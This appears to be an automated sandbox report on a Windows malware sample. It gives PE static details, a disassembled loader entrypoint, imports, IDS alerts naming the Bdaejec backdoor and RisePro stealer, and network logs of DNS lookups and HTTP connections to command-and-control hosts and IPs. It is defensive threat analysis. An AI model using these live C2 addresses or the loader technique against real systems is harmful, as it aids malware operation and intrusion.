                                              • Filename: 5A1FB27924AB99541F08D3A46321B88FA4CE52A2346EBD92DC8DA423C907CDE3.exe, Detection: malicious, Browse
                                              • Filename: 5AECB2A5BC5447DC736C29882193FEF4F2B007299A1817C664E1BA6A028363CF.exe, Detection: malicious, Browse
                                              • Filename: 58BB54DE7A3ED504F85202B0CD55AC2DA9FC821B5695AA854703F885CD80B044.exe, Detection: malicious, Browse
                                              • Filename: 5673773206126F12F4692E91C084B927357D9CF5FA3D5C312D89C9942B5C90FE.exe, Detection: malicious, Browse
                                              • Filename: 56586BDA88E32BE6A2AE5BA59A06127DC382CA0D5619DFDFE0DD0353EE4877AB.exe, Detection: malicious, Browse
                                              • Filename: 54E3EE54FAC434E25C03DED56A4680F1EA40A245D657440AC9C51BE7F27EF656.exe, Detection: malicious, Browse
                                              • Filename: 55282E8B63997F62AF3DD4B9D40CACB30A72D8DB1597D3F53057839CF7335750.exe, Detection: malicious, Browse
                                              • Filename: 550F.exe, Detection: malicious, Browse
                                              • Filename: 4FE08CC381F8F4EA6E3D8E34FDDF094193CCBBCC1CAE7217F0233893B9C566A2.exe, Detection: malicious, Browse
                                              • Filename: 537C7A26CE5E39643B98D9C078A14D5E955F0FCCF49073D05B1F8E3294636B41.exe, Detection: malicious, Browse
                                              Reputation:moderate, very likely benign file
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I.>.'..'.>.'..\.2.'.#.(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................

                                              C:\Windows\appcompat\Programs\Amcache.hve

                                              Download File
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:MS Windows registry file, NT/2000 or above
                                              Category:dropped
                                              Size (bytes):1835008
                                              Entropy (8bit):4.421552723020453
                                              Encrypted:false
                                              SSDEEP:6144:PSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnN00uhiTw:avloTMW+EZMM6DFyy03w
                                              MD5:F9084DEA8AB3B72D9909BE1FE750CD2F
                                              SHA1:9F99B1868C7A8316596B46857641EF01786C6E36
                                              SHA-256:123A1F3FA172C05ADCB0220BA085C3033F22FF237C7330CB0D5B9A5255FE7B92
                                              SHA-512:6D9D67B4F390DDC43529DC46F47F91D3FD337FE26E9CA9DE75EA018944C8E5FB16D3F1A001EDE6739912679A17EB1AD07582741C0D086756F6A0835635992EAC
                                              Malicious:false
                                              Reputation:low
                                              Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..d...................................................................................................................................................................................................................................................................................................................................................r.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):6.400989577134585
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe
                                              File size:411'648 bytes
                                              MD5:5ae2c7e495880d7e209a41158fd72984
                                              SHA1:f2bd4549f77a5c6af49259b60caf937b31decbf0
                                              SHA256:9664f55603f168dc5f7ac498789f5275b2c64fb5ad1bc7c185944421bd5a8777
                                              SHA512:16364431e2d8b0e48189f571b1b713da08129ea3b00d18723d981b7ace39b9d1cd7b55d4a48ea53bb8e7940f0c76ef70b5614a5a8d08bdb73827539e4cc7d5cf
                                              SSDEEP:12288:MZFjgB8S7dgKfFTJnUxzJQK2LM0r04JduPK1LOE/BE:M3jgCS7BFnUbR60wLLOSi
                                              TLSH:43946B34E601F026F4E20035EC5ED7FA65286B30275498EFF3D54EA9AAB16D1E230B57
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[xtt...'...'...'.r.&...'.r.&...'.v.&...'.v.&...'.v.&5..'.r.&...'.r.&...'...'c..'.v.&...'.v.'...'.v.&...'Rich...'........PE..L..

                                              File Icon

                                              Icon Hash:00928e8e8686b000

                                              Static PE Info

                                              General

                                              Entrypoint:0x464000
                                              Entrypoint Section:ku
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x623EAAFA [Sat Mar 26 05:56:10 2022 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:6
                                              OS Version Minor:0
                                              File Version Major:6
                                              File Version Minor:0
                                              Subsystem Version Major:6
                                              Subsystem Version Minor:0
                                              Import Hash:9734ba8626408cec04bb8fa7d8bb6e83

                                              Entrypoint Preview

                                              Instruction
                                              push ebp
                                              mov ebp, esp
                                              sub esp, 0000016Ch
                                              xor eax, eax
                                              push ebx
                                              push esi
                                              push edi
                                              mov dword ptr [ebp-24h], eax
                                              mov dword ptr [ebp-10h], eax
                                              mov dword ptr [ebp-14h], eax
                                              mov dword ptr [ebp-08h], eax
                                              mov dword ptr [ebp-0Ch], eax
                                              mov dword ptr [ebp-20h], eax
                                              mov dword ptr [ebp-18h], eax
                                              mov dword ptr [ebp-48h], 70515876h
                                              mov dword ptr [ebp-44h], 652E4175h
                                              mov dword ptr [ebp-40h], 00006578h
                                              mov dword ptr [ebp-3Ch], 00000000h
                                              call 00007EFCFCEB5D75h
                                              pop eax
                                              add eax, 00000225h
                                              mov dword ptr [ebp-04h], eax
                                              mov eax, dword ptr fs:[00000030h]
                                              mov dword ptr [ebp-28h], eax
                                              mov eax, dword ptr [ebp-04h]
                                              mov dword ptr [eax], E904C483h
                                              mov eax, dword ptr [ebp-04h]
                                              mov dword ptr [eax+04h], FFFD57E4h
                                              mov eax, dword ptr [ebp-28h]
                                              mov eax, dword ptr [eax+0Ch]
                                              mov eax, dword ptr [eax+1Ch]
                                              mov eax, dword ptr [eax]
                                              mov eax, dword ptr [eax+08h]
                                              mov ecx, dword ptr [eax+3Ch]
                                              mov ecx, dword ptr [ecx+eax+78h]
                                              add ecx, eax
                                              mov edi, dword ptr [ecx+1Ch]
                                              mov ebx, dword ptr [ecx+20h]
                                              mov esi, dword ptr [ecx+24h]
                                              mov ecx, dword ptr [ecx+18h]
                                              add esi, eax
                                              add edi, eax
                                              add ebx, eax
                                              xor edx, edx
                                              mov dword ptr [ebp-30h], esi
                                              mov dword ptr [ebp-1Ch], edx
                                              mov dword ptr [ebp-34h], ecx
                                              cmp edx, dword ptr [ebp-34h]
                                              jnc 00007EFCFCEB5EBEh
                                              movzx ecx, word ptr [esi+edx*2]
                                              mov edx, dword ptr [ebx+edx*4]
                                              mov esi, dword ptr [edi+ecx*4]
                                              add edx, eax
                                              mov ecx, dword ptr [edx]
                                              add esi, eax
                                              cmp ecx, 4D746547h
                                              jne 00007EFCFCEB5DC4h
                                              cmp dword ptr [edx+04h], 6C75646Fh
                                              jne 00007EFCFCEB5DBBh

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x5d3480x64.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x600000x1e8.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x610000x2584.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x5a6200x38.rdata
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x5a6580x40.rdata
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x530000x1bc.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x51e2f0x520001194472e2597aa2b13244e79144d4bceFalse0.4684939500762195data6.289312713354304IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rdata0x530000xad560xae005f1fb1910534a3337bd13bc47de54e80False0.4108072916666667data5.0095148798074804IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0x5e0000x17ec0xc0041c953f6fa233668d764d083f279d54fFalse0.189453125data2.8141571695432828IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc0x600000x1e80x20017468f9d018731f1fbdeb298bbd3cd73False0.5390625data4.756146432197578IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0x610000x25840x2600e29e1f7c8bb4987b63b6921906d4431eFalse0.7485608552631579data6.562239697735675IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                              ku0x640000x50000x42007dcacc3fac3b8a0c73928c715c8e9b38False0.7775213068181818data6.934525403554348IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                              Resources

                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_MANIFEST0x600600x188XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5892857142857143

                                              Imports

                                              DLLImport
                                              KERNEL32.dllCreateDirectoryA, IsWow64Process, lstrcatA, GetModuleHandleA, lstrcpyA, WinExec, lstrlenA, HeapAlloc, GetProcAddress, lstrcpynA, GetProcessHeap, WriteConsoleW, LocalFree, GetWindowsDirectoryA, CloseHandle, DeleteFileA, LoadLibraryA, GetFileAttributesA, GetLastError, CopyFileA, Sleep, LocalAlloc, GetVolumeInformationA, GetCurrentProcess, HeapFree, GetModuleFileNameA, SetEndOfFile, HeapReAlloc, HeapSize, ReadConsoleW, ReadFile, FlushFileBuffers, CreateFileW, GetStringTypeW, SetStdHandle, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, RaiseException, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, GetStdHandle, WriteFile, MultiByteToWideChar, LCMapStringW, MoveFileExW, GetFileType, GetConsoleOutputCP, GetConsoleMode, GetFileSizeEx, SetFilePointerEx, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
                                              ADVAPI32.dllCreateServiceA, RegCloseKey, StartServiceCtrlDispatcherA, GetCurrentHwProfileA, CloseServiceHandle, RegQueryValueExA, SetServiceStatus, RegisterServiceCtrlHandlerA, OpenSCManagerA, GetUserNameA, StartServiceA, RegOpenKeyExA, OpenServiceA
                                              SHELL32.dllSHGetSpecialFolderPathA, SHGetFolderPathA, ShellExecuteA
                                              SETUPAPI.dllSetupDiGetClassDevsA, SetupDiEnumDeviceInterfaces, SetupDiGetDeviceInterfaceDetailA, SetupDiEnumDeviceInfo

                                              Possible Origin

                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishUnited States

                                              Network Behavior

                                              Suricata IDS Alerts

                                              TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                              2024-07-24T17:26:53.131145+0200UDP2838522ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup6085853192.168.2.51.1.1.1
                                              2024-07-24T17:26:51.124380+0200UDP2838522ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup6085853192.168.2.51.1.1.1
                                              2024-07-24T17:26:52.119126+0200UDP2838522ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup6085853192.168.2.51.1.1.1
                                              2024-07-24T17:27:38.899025+0200UDP2043080ET MALWARE Observed DNS Query to RisePro Domain (softs-portal .com)5216953192.168.2.51.1.1.1

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jul 24, 2024 17:26:51.177038908 CEST49704443192.168.2.5149.154.167.99
                                              Jul 24, 2024 17:26:51.177088022 CEST44349704149.154.167.99192.168.2.5
                                              Jul 24, 2024 17:26:51.177169085 CEST49704443192.168.2.5149.154.167.99
                                              Jul 24, 2024 17:26:51.178488970 CEST49704443192.168.2.5149.154.167.99
                                              Jul 24, 2024 17:26:51.178507090 CEST44349704149.154.167.99192.168.2.5
                                              Jul 24, 2024 17:26:51.941529989 CEST44349704149.154.167.99192.168.2.5
                                              Jul 24, 2024 17:26:51.941642046 CEST49704443192.168.2.5149.154.167.99
                                              Jul 24, 2024 17:26:51.945427895 CEST49704443192.168.2.5149.154.167.99
                                              Jul 24, 2024 17:26:51.945451975 CEST44349704149.154.167.99192.168.2.5
                                              Jul 24, 2024 17:26:51.945751905 CEST44349704149.154.167.99192.168.2.5
                                              Jul 24, 2024 17:26:51.990194082 CEST49704443192.168.2.5149.154.167.99
                                              Jul 24, 2024 17:26:52.005563974 CEST49704443192.168.2.5149.154.167.99
                                              Jul 24, 2024 17:26:52.048520088 CEST44349704149.154.167.99192.168.2.5
                                              Jul 24, 2024 17:26:52.438644886 CEST44349704149.154.167.99192.168.2.5
                                              Jul 24, 2024 17:26:52.438673973 CEST44349704149.154.167.99192.168.2.5
                                              Jul 24, 2024 17:26:52.438684940 CEST44349704149.154.167.99192.168.2.5
                                              Jul 24, 2024 17:26:52.438761950 CEST49704443192.168.2.5149.154.167.99
                                              Jul 24, 2024 17:26:52.438760042 CEST44349704149.154.167.99192.168.2.5
                                              Jul 24, 2024 17:26:52.438810110 CEST44349704149.154.167.99192.168.2.5
                                              Jul 24, 2024 17:26:52.438823938 CEST44349704149.154.167.99192.168.2.5
                                              Jul 24, 2024 17:26:52.438841105 CEST49704443192.168.2.5149.154.167.99
                                              Jul 24, 2024 17:26:52.438874006 CEST49704443192.168.2.5149.154.167.99
                                              Jul 24, 2024 17:26:52.438889027 CEST49704443192.168.2.5149.154.167.99
                                              Jul 24, 2024 17:26:52.440705061 CEST44349704149.154.167.99192.168.2.5
                                              Jul 24, 2024 17:26:52.440771103 CEST44349704149.154.167.99192.168.2.5
                                              Jul 24, 2024 17:26:52.440773964 CEST49704443192.168.2.5149.154.167.99
                                              Jul 24, 2024 17:26:52.440821886 CEST49704443192.168.2.5149.154.167.99
                                              Jul 24, 2024 17:26:52.473411083 CEST49704443192.168.2.5149.154.167.99
                                              Jul 24, 2024 17:26:52.473434925 CEST44349704149.154.167.99192.168.2.5
                                              Jul 24, 2024 17:26:52.473447084 CEST49704443192.168.2.5149.154.167.99
                                              Jul 24, 2024 17:26:52.473452091 CEST44349704149.154.167.99192.168.2.5
                                              Jul 24, 2024 17:26:52.507205963 CEST4970580192.168.2.5212.193.30.45
                                              Jul 24, 2024 17:26:52.512545109 CEST8049705212.193.30.45192.168.2.5
                                              Jul 24, 2024 17:26:52.512634993 CEST4970580192.168.2.5212.193.30.45
                                              Jul 24, 2024 17:26:52.516983032 CEST4970580192.168.2.5212.193.30.45
                                              Jul 24, 2024 17:26:52.522747993 CEST8049705212.193.30.45192.168.2.5
                                              Jul 24, 2024 17:27:14.102498055 CEST8049705212.193.30.45192.168.2.5
                                              Jul 24, 2024 17:27:14.102592945 CEST4970580192.168.2.5212.193.30.45
                                              Jul 24, 2024 17:27:14.102998972 CEST4970580192.168.2.5212.193.30.45
                                              Jul 24, 2024 17:27:14.105359077 CEST4972380192.168.2.5212.193.30.29
                                              Jul 24, 2024 17:27:14.412169933 CEST4970580192.168.2.5212.193.30.45
                                              Jul 24, 2024 17:27:14.527017117 CEST8049705212.193.30.45192.168.2.5
                                              Jul 24, 2024 17:27:14.528589010 CEST4970580192.168.2.5212.193.30.45
                                              Jul 24, 2024 17:27:14.529719114 CEST8049705212.193.30.45192.168.2.5
                                              Jul 24, 2024 17:27:14.532546997 CEST4970580192.168.2.5212.193.30.45
                                              Jul 24, 2024 17:27:15.021413088 CEST4970580192.168.2.5212.193.30.45
                                              Jul 24, 2024 17:27:15.040715933 CEST8049705212.193.30.45192.168.2.5
                                              Jul 24, 2024 17:27:15.040781975 CEST4970580192.168.2.5212.193.30.45
                                              Jul 24, 2024 17:27:15.044125080 CEST8049705212.193.30.45192.168.2.5
                                              Jul 24, 2024 17:27:15.044162035 CEST8049723212.193.30.29192.168.2.5
                                              Jul 24, 2024 17:27:15.044173002 CEST8049705212.193.30.45192.168.2.5
                                              Jul 24, 2024 17:27:15.044256926 CEST4970580192.168.2.5212.193.30.45
                                              Jul 24, 2024 17:27:15.044450998 CEST8049705212.193.30.45192.168.2.5
                                              Jul 24, 2024 17:27:15.044501066 CEST4970580192.168.2.5212.193.30.45
                                              Jul 24, 2024 17:27:15.044502020 CEST4972380192.168.2.5212.193.30.29
                                              Jul 24, 2024 17:27:15.124949932 CEST4972380192.168.2.5212.193.30.29
                                              Jul 24, 2024 17:27:15.130400896 CEST8049723212.193.30.29192.168.2.5
                                              Jul 24, 2024 17:27:36.494170904 CEST8049723212.193.30.29192.168.2.5
                                              Jul 24, 2024 17:27:36.494250059 CEST4972380192.168.2.5212.193.30.29
                                              Jul 24, 2024 17:27:36.494359016 CEST4972380192.168.2.5212.193.30.29
                                              Jul 24, 2024 17:27:36.499195099 CEST8049723212.193.30.29192.168.2.5
                                              Jul 24, 2024 17:27:36.504184961 CEST49724443192.168.2.5104.20.4.235
                                              Jul 24, 2024 17:27:36.504224062 CEST44349724104.20.4.235192.168.2.5
                                              Jul 24, 2024 17:27:36.504313946 CEST49724443192.168.2.5104.20.4.235
                                              Jul 24, 2024 17:27:36.504707098 CEST49724443192.168.2.5104.20.4.235
                                              Jul 24, 2024 17:27:36.504720926 CEST44349724104.20.4.235192.168.2.5
                                              Jul 24, 2024 17:27:37.018706083 CEST44349724104.20.4.235192.168.2.5
                                              Jul 24, 2024 17:27:37.018802881 CEST49724443192.168.2.5104.20.4.235
                                              Jul 24, 2024 17:27:37.023071051 CEST49724443192.168.2.5104.20.4.235
                                              Jul 24, 2024 17:27:37.023082018 CEST44349724104.20.4.235192.168.2.5
                                              Jul 24, 2024 17:27:37.023488045 CEST44349724104.20.4.235192.168.2.5
                                              Jul 24, 2024 17:27:37.041934013 CEST49724443192.168.2.5104.20.4.235
                                              Jul 24, 2024 17:27:37.084501982 CEST44349724104.20.4.235192.168.2.5
                                              Jul 24, 2024 17:27:37.546719074 CEST44349724104.20.4.235192.168.2.5
                                              Jul 24, 2024 17:27:37.546960115 CEST44349724104.20.4.235192.168.2.5
                                              Jul 24, 2024 17:27:37.547471046 CEST49724443192.168.2.5104.20.4.235
                                              Jul 24, 2024 17:27:37.547842979 CEST49724443192.168.2.5104.20.4.235
                                              Jul 24, 2024 17:27:37.547874928 CEST44349724104.20.4.235192.168.2.5
                                              Jul 24, 2024 17:27:37.547889948 CEST49724443192.168.2.5104.20.4.235
                                              Jul 24, 2024 17:27:37.547899008 CEST44349724104.20.4.235192.168.2.5
                                              Jul 24, 2024 17:27:38.053617001 CEST4972580192.168.2.5172.67.133.215
                                              Jul 24, 2024 17:27:38.060707092 CEST8049725172.67.133.215192.168.2.5
                                              Jul 24, 2024 17:27:38.060821056 CEST4972580192.168.2.5172.67.133.215
                                              Jul 24, 2024 17:27:38.060959101 CEST4972580192.168.2.5172.67.133.215
                                              Jul 24, 2024 17:27:38.107289076 CEST8049725172.67.133.215192.168.2.5
                                              Jul 24, 2024 17:27:38.895979881 CEST8049725172.67.133.215192.168.2.5
                                              Jul 24, 2024 17:27:38.896150112 CEST8049725172.67.133.215192.168.2.5
                                              Jul 24, 2024 17:27:38.896228075 CEST4972580192.168.2.5172.67.133.215
                                              Jul 24, 2024 17:27:38.912261009 CEST4972680192.168.2.5212.193.30.21
                                              Jul 24, 2024 17:27:38.920031071 CEST8049726212.193.30.21192.168.2.5
                                              Jul 24, 2024 17:27:38.920129061 CEST4972680192.168.2.5212.193.30.21
                                              Jul 24, 2024 17:27:38.920288086 CEST4972680192.168.2.5212.193.30.21
                                              Jul 24, 2024 17:27:38.920495987 CEST4972680192.168.2.5212.193.30.21
                                              Jul 24, 2024 17:27:38.925249100 CEST8049726212.193.30.21192.168.2.5
                                              Jul 24, 2024 17:27:38.925308943 CEST8049726212.193.30.21192.168.2.5
                                              Jul 24, 2024 17:28:00.338782072 CEST8049726212.193.30.21192.168.2.5
                                              Jul 24, 2024 17:28:00.338963985 CEST4972680192.168.2.5212.193.30.21
                                              Jul 24, 2024 17:28:00.339040041 CEST4972680192.168.2.5212.193.30.21
                                              Jul 24, 2024 17:28:00.340441942 CEST4972980192.168.2.5212.193.30.21
                                              Jul 24, 2024 17:28:00.343938112 CEST8049726212.193.30.21192.168.2.5
                                              Jul 24, 2024 17:28:00.345361948 CEST8049729212.193.30.21192.168.2.5
                                              Jul 24, 2024 17:28:00.345458984 CEST4972980192.168.2.5212.193.30.21
                                              Jul 24, 2024 17:28:00.345628023 CEST4972980192.168.2.5212.193.30.21
                                              Jul 24, 2024 17:28:00.345663071 CEST4972980192.168.2.5212.193.30.21
                                              Jul 24, 2024 17:28:00.350780964 CEST8049729212.193.30.21192.168.2.5
                                              Jul 24, 2024 17:28:00.350790977 CEST8049729212.193.30.21192.168.2.5
                                              Jul 24, 2024 17:28:21.830554008 CEST8049729212.193.30.21192.168.2.5
                                              Jul 24, 2024 17:28:21.830645084 CEST4972980192.168.2.5212.193.30.21
                                              Jul 24, 2024 17:28:21.830719948 CEST4972980192.168.2.5212.193.30.21
                                              Jul 24, 2024 17:28:21.832005978 CEST4973080192.168.2.5212.193.30.21
                                              Jul 24, 2024 17:28:21.835539103 CEST8049729212.193.30.21192.168.2.5
                                              Jul 24, 2024 17:28:21.836882114 CEST8049730212.193.30.21192.168.2.5
                                              Jul 24, 2024 17:28:21.836966991 CEST4973080192.168.2.5212.193.30.21
                                              Jul 24, 2024 17:28:21.837099075 CEST4973080192.168.2.5212.193.30.21
                                              Jul 24, 2024 17:28:21.837116957 CEST4973080192.168.2.5212.193.30.21
                                              Jul 24, 2024 17:28:21.842133045 CEST8049730212.193.30.21192.168.2.5
                                              Jul 24, 2024 17:28:21.842617035 CEST8049730212.193.30.21192.168.2.5
                                              Jul 24, 2024 17:28:41.146620035 CEST4972580192.168.2.5172.67.133.215
                                              Jul 24, 2024 17:28:41.152208090 CEST8049725172.67.133.215192.168.2.5
                                              Jul 24, 2024 17:28:41.152287960 CEST4972580192.168.2.5172.67.133.215
                                              Jul 24, 2024 17:28:43.231699944 CEST8049730212.193.30.21192.168.2.5
                                              Jul 24, 2024 17:28:43.231833935 CEST4973080192.168.2.5212.193.30.21
                                              Jul 24, 2024 17:28:43.231946945 CEST4973080192.168.2.5212.193.30.21
                                              Jul 24, 2024 17:28:43.233546019 CEST4973180192.168.2.5212.193.30.21
                                              Jul 24, 2024 17:28:43.238523960 CEST8049730212.193.30.21192.168.2.5
                                              Jul 24, 2024 17:28:43.238543034 CEST8049731212.193.30.21192.168.2.5
                                              Jul 24, 2024 17:28:43.238655090 CEST4973180192.168.2.5212.193.30.21
                                              Jul 24, 2024 17:28:43.238810062 CEST4973180192.168.2.5212.193.30.21
                                              Jul 24, 2024 17:28:43.238838911 CEST4973180192.168.2.5212.193.30.21
                                              Jul 24, 2024 17:28:43.244564056 CEST8049731212.193.30.21192.168.2.5
                                              Jul 24, 2024 17:28:43.244579077 CEST8049731212.193.30.21192.168.2.5

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jul 24, 2024 17:26:51.124380112 CEST6085853192.168.2.51.1.1.1
                                              Jul 24, 2024 17:26:51.154299021 CEST6205653192.168.2.51.1.1.1
                                              Jul 24, 2024 17:26:51.171768904 CEST53620561.1.1.1192.168.2.5
                                              Jul 24, 2024 17:26:52.119126081 CEST6085853192.168.2.51.1.1.1
                                              Jul 24, 2024 17:26:53.131145000 CEST6085853192.168.2.51.1.1.1
                                              Jul 24, 2024 17:26:55.135660887 CEST53608581.1.1.1192.168.2.5
                                              Jul 24, 2024 17:26:55.135715961 CEST53608581.1.1.1192.168.2.5
                                              Jul 24, 2024 17:26:55.135817051 CEST53608581.1.1.1192.168.2.5
                                              Jul 24, 2024 17:27:36.495867014 CEST5984253192.168.2.51.1.1.1
                                              Jul 24, 2024 17:27:36.503290892 CEST53598421.1.1.1192.168.2.5
                                              Jul 24, 2024 17:27:37.550316095 CEST5749353192.168.2.51.1.1.1
                                              Jul 24, 2024 17:27:38.052373886 CEST53574931.1.1.1192.168.2.5
                                              Jul 24, 2024 17:27:38.899024963 CEST5216953192.168.2.51.1.1.1
                                              Jul 24, 2024 17:27:38.910533905 CEST53521691.1.1.1192.168.2.5

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Jul 24, 2024 17:26:51.124380112 CEST192.168.2.51.1.1.10x9c5fStandard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
                                              Jul 24, 2024 17:26:51.154299021 CEST192.168.2.51.1.1.10xfaf5Standard query (0)telegram.orgA (IP address)IN (0x0001)false
                                              Jul 24, 2024 17:26:52.119126081 CEST192.168.2.51.1.1.10x9c5fStandard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
                                              Jul 24, 2024 17:26:53.131145000 CEST192.168.2.51.1.1.10x9c5fStandard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
                                              Jul 24, 2024 17:27:36.495867014 CEST192.168.2.51.1.1.10x1d9fStandard query (0)pastebin.comA (IP address)IN (0x0001)false
                                              Jul 24, 2024 17:27:37.550316095 CEST192.168.2.51.1.1.10xccd1Standard query (0)wfsdragon.ruA (IP address)IN (0x0001)false
                                              Jul 24, 2024 17:27:38.899024963 CEST192.168.2.51.1.1.10xc779Standard query (0)softs-portal.comA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Jul 24, 2024 17:26:51.171768904 CEST1.1.1.1192.168.2.50xfaf5No error (0)telegram.org149.154.167.99A (IP address)IN (0x0001)false
                                              Jul 24, 2024 17:26:55.135660887 CEST1.1.1.1192.168.2.50x9c5fServer failure (2)ddos.dnsnb8.netnonenoneA (IP address)IN (0x0001)false
                                              Jul 24, 2024 17:26:55.135715961 CEST1.1.1.1192.168.2.50x9c5fServer failure (2)ddos.dnsnb8.netnonenoneA (IP address)IN (0x0001)false
                                              Jul 24, 2024 17:26:55.135817051 CEST1.1.1.1192.168.2.50x9c5fServer failure (2)ddos.dnsnb8.netnonenoneA (IP address)IN (0x0001)false
                                              Jul 24, 2024 17:27:36.503290892 CEST1.1.1.1192.168.2.50x1d9fNo error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                              Jul 24, 2024 17:27:36.503290892 CEST1.1.1.1192.168.2.50x1d9fNo error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                              Jul 24, 2024 17:27:36.503290892 CEST1.1.1.1192.168.2.50x1d9fNo error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                              Jul 24, 2024 17:27:38.052373886 CEST1.1.1.1192.168.2.50xccd1No error (0)wfsdragon.ru172.67.133.215A (IP address)IN (0x0001)false
                                              Jul 24, 2024 17:27:38.052373886 CEST1.1.1.1192.168.2.50xccd1No error (0)wfsdragon.ru104.21.5.208A (IP address)IN (0x0001)false
                                              Jul 24, 2024 17:27:38.910533905 CEST1.1.1.1192.168.2.50xc779Name error (3)softs-portal.comnonenoneA (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • telegram.org
                                              • pastebin.com
                                              • 212.193.30.45
                                              • 212.193.30.29
                                              • wfsdragon.ru
                                              • 212.193.30.21

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.549705212.193.30.45803792C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 24, 2024 17:26:52.516983032 CEST203OUTGET /proxies.txt HTTP/1.1
                                              Connection: Keep-Alive
